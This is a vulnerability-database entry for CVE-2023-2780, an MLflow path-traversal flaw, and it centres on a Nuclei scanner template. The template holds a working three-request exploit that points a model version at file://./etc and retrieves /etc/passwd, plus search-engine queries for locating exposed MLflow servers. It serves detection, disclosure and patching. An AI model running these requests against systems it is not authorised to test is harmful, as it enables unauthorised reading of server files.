Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-2780HistoryMay 22, 2023 - 10:26 a.m.
Mlflow <2.3.1 - Local File Inclusion Bypass
2023-05-2210:26:58
ProjectDiscovery
github.com
4
cve2023
mlflow
oss
lfi
huntr
mlflow
cvss
vulnerability
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.03 Low
EPSS
Percentile
91.0%
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.
id: CVE-2023-2780
info:
name: Mlflow <2.3.1 - Local File Inclusion Bypass
author: iamnoooob,pdresearch
severity: critical
description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade Mlflow to version 2.3.1 or later to mitigate the vulnerability.
reference:
- https://huntr.dev/bounties/b12b0073-0bb0-4bd1-8fc2-ec7f17fd7689/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2780
- https://github.com/mlflow/mlflow/commit/fae77a525dd908c56d6204a4cef1c1c75b4e9857
- https://github.com/Ostorlab/KEV
- https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-2780
cwe-id: CWE-29
epss-score: 0.04145
epss-percentile: 0.92175
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: lfprojects
product: mlflow
shodan-query: http.title:"mlflow"
fofa-query:
- title="mlflow"
- app="mlflow"
google-query: intitle:"mlflow"
tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects
http:
- raw:
- |
POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=utf-8
{"name":"{{randstr}}"}
- |
POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=utf-8
{"name":"{{randstr}}","source":"file://./etc"}
- |
GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- '"version": "([0-9.]+)",'
internal: true
part: body
# digest: 4a0a00473045022100803bd551a319393f56d5aae8e1a5f4b50669875f42dfffcf37671598462004d1022049f95322641e98ebee3e86be573642b94487e3b09e2ae104fbe8ac3fe71a2dac:922c64590222798bb761d5b6d8e72950Related
prion
prion
Path traversal
2023-05-17 21:15:00
veracode
veracode
Path Traversal
2023-05-23 04:46:49
osv
osv
PYSEC-2023-69
2023-05-17 21:15:00
BIT-mlflow-2023-2780
2024-03-06 10:58:54
CVE-2023-2780
2023-05-17 21:15:09
nvd
nvd
CVE-2023-2780
2023-05-17 21:15:09
cve
cve
CVE-2023-2780
2023-05-17 21:15:09
cvelist
cvelist
CVE-2023-2780 Path Traversal: '\..\filename' in mlflow/mlflow
2023-05-17 00:00:00
huntr
huntr
Local File Read Bypass in mlflow/mlflow
2023-03-27 11:20:57
github
github
mlflow Path Traversal vulnerability
2023-05-17 21:30:22
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.5 High
AI Score
Confidence
High
0.03 Low
EPSS
Percentile
91.0%
Related for NUCLEI:CVE-2023-2780